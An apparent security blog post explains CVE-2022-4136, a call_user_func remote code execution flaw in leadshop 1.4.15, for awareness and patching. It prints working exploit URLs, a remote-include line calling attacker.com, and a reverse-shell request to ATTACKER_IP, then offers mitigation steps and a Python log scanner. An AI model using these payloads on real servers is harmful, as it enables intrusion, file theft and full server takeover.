Published: June 2024

Author: StackNerd

A critical vulnerability, CVE-2022-4136, has been discovered in the open-source e-commerce platform qmpass/leadshop version 1.4.15. The flaw exposes a dangerous method in `leadshop.php` that lets an attacker execute any PHP function by sending a crafted HTTP GET request. If exploited, this leads straight to *Remote Code Execution (RCE)*, giving the attacker full control over the target host.

In this article, we break down how this vulnerability works, show code snippets, and walk through a proof of concept (PoC) exploit. Everything is explained in clear, simple language.


## Background

qmpass/leadshop is a popular open-source shop system built in PHP. Many small businesses rely on it for their web stores.

Version 1.4.15 has a critical flaw. The script leadshop.php exposes a method that doesn't properly check or sanitize input from the URL. As a result, an attacker can call *any PHP function* by passing a parameter in the GET request.


## Technical Details

The core issue is in the way leadshop.php handles incoming requests. It takes user input from the URL and passes it straight to call_user_func(), a PHP function able to call any other built-in or user-defined function. There are no checks, no validation, and no filtering.

That means anyone with access to the web interface can execute arbitrary PHP functions—even system-level ones.


## Code Snippet – Vulnerable Part

Here's a simplified version of the vulnerable code from `leadshop.php`:

```php
<?php
// Vulnerable code in leadshop.php (simplified)

if (isset($_GET['function'])) {
    $function = $_GET['function'];
    $param = $_GET['param'] ?? '';

    // No validation or sanitization: whatever callable name arrives
    // in the URL is invoked with the attacker-supplied argument.
    call_user_func($function, $param);
}
?>
```

What's the problem?

- If you visit `http://victim.com/leadshop.php?function=phpinfo`, the script will call `phpinfo()` and display the full PHP configuration.
- Even more dangerous: you could call `system`, `exec`, or similar functions with your own commands.


## How Attackers Exploit It

An attacker just needs to know the URL to leadshop.php. They can then send GET requests to execute any function, letting them run shell commands, read or write files, or even open remote backdoors.

- To get system info:

  `http://victim.com/leadshop.php?function=system&param=whoami`

- To read sensitive files:

  `http://victim.com/leadshop.php?function=file_get_contents&param=/etc/passwd`

- To execute an arbitrary script from the internet (if `allow_url_fopen`/`allow_url_include` is enabled):

  `http://victim.com/leadshop.php?function=include&param=http://attacker.com/shell.php`


## Proof of Concept (PoC)

### Simple RCE

Let's say the attacker wants to run `whoami` to see what user the web server is running as.

Request:

```http
GET /leadshop.php?function=system&param=whoami HTTP/1.1
Host: victim.com
```

In the browser:

`http://victim.com/leadshop.php?function=system&param=whoami`

Response:

```text
www-data
```

### Reverse Shell Example (Linux)

```http
GET /leadshop.php?function=system&param=bash+-c+'bash+-i+>%26+/dev/tcp/ATTACKER_IP/1234+>%261' HTTP/1.1
Host: victim.com
```

*If the server is vulnerable, the attacker now has a shell!*


## How to Fix / Mitigate

- Upgrade to a safe version: check the Leadshop releases for patches.
- For administrators: review web server logs for suspicious access to this endpoint.
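Reviewing those logs is easier with a small script than with grep, because the `function` and `param` values are URL-encoded (the reverse-shell request above hides its `&` as `%26`). The following Python is an added example, not code from the article or from the Leadshop project: it parses combined-format access log lines (constructed here to mirror the URLs shown above; the client IP and timestamps are made up) and flags every request to `leadshop.php` that carries a `function` parameter, rating command-execution and file functions highest.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines ("combined" format). The request targets mirror the
# URLs in the article; the client IP and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Nov/2022:08:01:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Nov/2022:08:01:30 +0000] "GET /leadshop.php?function=phpinfo HTTP/1.1" 200 84123 "-" "curl/7.81.0"
203.0.113.5 - - [24/Nov/2022:08:02:02 +0000] "GET /leadshop.php?function=system&param=whoami HTTP/1.1" 200 9 "-" "curl/7.81.0"
203.0.113.5 - - [24/Nov/2022:08:02:40 +0000] "GET /leadshop.php?function=file_get_contents&param=/etc/passwd HTTP/1.1" 200 0 "-" "curl/7.81.0"
203.0.113.5 - - [24/Nov/2022:08:03:15 +0000] "GET /leadshop.php?function=system&param=bash+-c+'bash+-i+>%26+/dev/tcp/ATTACKER_IP/1234+>%261' HTTP/1.1" 200 0 "-" "curl/7.81.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# PHP built-ins that run OS commands, and ones that read or write files.
EXEC_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}
FILE_FUNCTIONS = {"file_get_contents", "file_put_contents", "readfile", "fopen", "unlink"}


def parse_request(line):
    """Return (ip, timestamp, path, query dict), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qs percent-decodes and maps '+' to space, so %26 comes back as a literal '&'.
    return m.group("ip"), m.group("ts"), url.path, parse_qs(url.query, keep_blank_values=True)


def scan_access_log(text):
    """Flag every request to leadshop.php that carries a 'function' parameter."""
    findings = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, ts, path, query = parsed
        if not path.lower().endswith("/leadshop.php") or "function" not in query:
            continue
        func = query["function"][0]
        if func in EXEC_FUNCTIONS:
            severity = "critical"  # OS command execution
        elif func in FILE_FUNCTIONS:
            severity = "high"      # arbitrary file read/write
        else:
            severity = "medium"    # any caller-chosen callable is abuse of the endpoint
        findings.append({"ip": ip, "time": ts, "function": func,
                         "param": query.get("param", [""])[0], "severity": severity})
    return findings
```

Run it over the real access log (`scan_access_log(open(path).read())`) and treat any finding as a compromise indicator until proven otherwise, since the patched endpoint should not accept a caller-chosen function name at all.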


## Summary

CVE-2022-4136 is a classic case of dangerous PHP design: user input is blindly trusted and executed. Attackers can abuse this to fully compromise qmpass/leadshop sites and underlying servers. If your site runs this version, patch IMMEDIATELY or take the site offline until fixed.

Stay safe, keep your code clean, and always validate inputs!

Do you use leadshop? Check your deployment, update fast, and protect your store from attacks!



## Timeline

- Published on: 11/24/2022 08:15:00 UTC
- Last modified on: 11/30/2022 19:52:00 UTC